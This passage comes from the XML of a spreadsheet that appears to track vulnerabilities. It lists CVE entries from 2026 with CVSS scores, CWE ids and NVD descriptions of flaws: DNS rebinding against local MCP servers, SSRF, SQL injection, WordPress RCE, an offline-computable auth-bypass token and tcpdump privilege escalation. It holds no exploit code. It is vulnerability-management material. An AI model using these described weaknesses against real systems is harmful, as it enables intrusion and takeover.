      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>genieacs-mcp is an MCP server for GenieACS written in Go. Prior to 0.3.2, the Streamable HTTP transport in cmd/server/main.go creates an unauthenticated /mcp listener on the default MCP_LISTEN_ADDR value 127.0.0.1:8080 when MCP_AUTH_TOKEN is unset and the httpSrv.Start(addr) branch does not validate the Host or Origin headers. A malicious website can use DNS rebinding to send browser requests with attacker-controlled Host and Origin values to the loopback listener, initialize an MCP session, list tools, and invoke operations against the GenieACS NBI configured by ACS_URL. Successful exploitation can expose or modify CPE management state, including device reboots, firmware tasks, TR-069 parameter changes, presets, provisions, tags, connection requests, and task operations. The npm wrapper is not affected because it forces TRANSPORT=stdio and does not expose an HTTP listener. This issue is fixed in version 0.3.2.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55637</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57866</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>Server side request forgery in Apache Impala versions 4.4.x and 4.5.x.  Authenticated Impala users with permissions to execute the ai_generate_text() function can exfiltrate secrets provided by the credential providers configured in the `hadoop.security.credential.provider.path` property of `core-site.xml`. The secret's key must be known to the user.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57866</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62316</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, ufo/client/mcp/http_servers/linux_mcp_server.py binds a FastMCP streamable HTTP server to localhost:8010 but does not validate the Host, Origin, or Sec-Fetch-Site headers. An attacker-controlled web page can use DNS rebinding to reach the local /mcp endpoint, enumerate tool schemas through tools/list, and invoke execute_command with a valid UFO_MCP_API_KEY to read files or execute allowed operating system commands as the victim's user. This issue is fixed in version 3.0.8.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62316</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69857</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_cosmos_db</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Azure Cosmos DB allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69857</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71808</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote authenticated attackers to execute arbitrary SQL commands via the ${} string concatenation in AdminMapper.java and multiple other Mapper files (including MerchantWithdrawRecordMapper.java and MemberWithdrawRecordMapper.java).</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71808</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75161</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>An issue in the ugw-restart method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to inject arbitrary code into the dpcheck system utility executed as root.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75161</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75166</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-276</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>Insecure Permission vulnerability in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows the low-privileged service user to execute /usr/bin/tcpdump as root without a password. By leveraging the tcpdump -z option, an authenticated attacker can achieve arbitrary command execution.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75166</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75169</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in /cgi-bin/ugwupload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with Admin role to upload files with arbitrary content to hardcoded paths.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75169</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75339</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>The storage endpoint /storage/upload of cjbi admin3 v3.0.0 are missing permission checks. /Any logged-in user can upload arbitrary files, and any anonymous attacker can download them.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75339</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76801</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>The FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.1.10 via the value function. This is due to a trivially bypassable regex blacklist in Executer::allowedToRun() that fails to block WordPress core functions such as wp_insert_user, update_option, and file_put_contents, combined with no sanitization of PHP condition rule values stored via the firebox_meta REST endpoint. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. On sites upgraded from a version prior to 3.1.10, the Migrator::preserveCampaignRoleAccess() function automatically grants the edit_fireboxes and publish_fireboxes capabilities to the Author role, lowering the effective entry point to Author-level access.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76801</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79423</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>An authenticated remote code execution (RCE) vulnerability in the admin_config.php component of seacms v13.6 allows attackers to execute arbitrary code via a crafted POST request.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79423</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80099</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>Several Newfold plugins are vulnerable to Authentication Bypass. The vulnerability exists because the plugins bundle the wp-module-data module. In the module, the `authenticate()` method — registered on the `rest_authentication_errors` filter and therefore evaluated for every unauthenticated REST API request — performs an HMAC-style Bearer token comparison that degenerates when `HiiveConnection::get_auth_token()` returns `false`: PHP coerces `strrev(false)` to `strrev('')`, collapsing the secret salt to the publicly known constant `hash('sha256', '') = e3b0c44...`, while all remaining hash inputs (HTTP method, request URL, raw request body, and the `X-Timestamp` header) remain fully attacker-controlled. This makes it possible for unauthenticated attackers to compute a valid Bearer token entirely offline, pass the token equality check, and have `wp_set_current_user()` invoked against the first administrator returned by `get_users(['role' =&gt; 'administrator'])`, granting full administrator-level access and enabling arbitrary REST API operations such as creating new administrator accounts and achieving complete site takeover. Vulnerable versions are WP Plugin Crazy Domains (&lt;= 2.5.2), WP Plugin Web (&lt;= 2.3.4), WP Plugin Hostgator (&lt;= 3.1.0), WP Plugin Bluehost (&lt;= 4.17.1). The affected module is vulnerable in versions up to, and including, 2.9.4.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80099</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80130</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80130</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80914</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186"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S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80914</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80921</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: vsie: zero stale crypto bits
When shadowing crypto access bits from a format0 apcb (crycb 0 or 1),
the bits 64..255 are unchanged from whatever is in the vsie page in the
crycb and thus in the apcb. This gives a nested guest potential access
to a device no longer available. Zero out the remaining bits.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80921</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82089</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>The wallabag (aka fr.gaulupeau.apps.InThePoche) application through 2.6.0 for Android allows XSS because /api/entries data is loaded into a WebView.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82089</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86099</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>Chainlit through 2.12.0 fails to validate the client-supplied socket.io sessionId parameter, allowing unauthenticated attackers to traverse filesystem paths by injecting absolute or relative path sequences. Attackers can craft malicious sessionId values that escape the upload directory and recursively delete arbitrary directories accessible to the service process.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86099</t>
        </is>
      </c>
    </row>
    <row r="190">
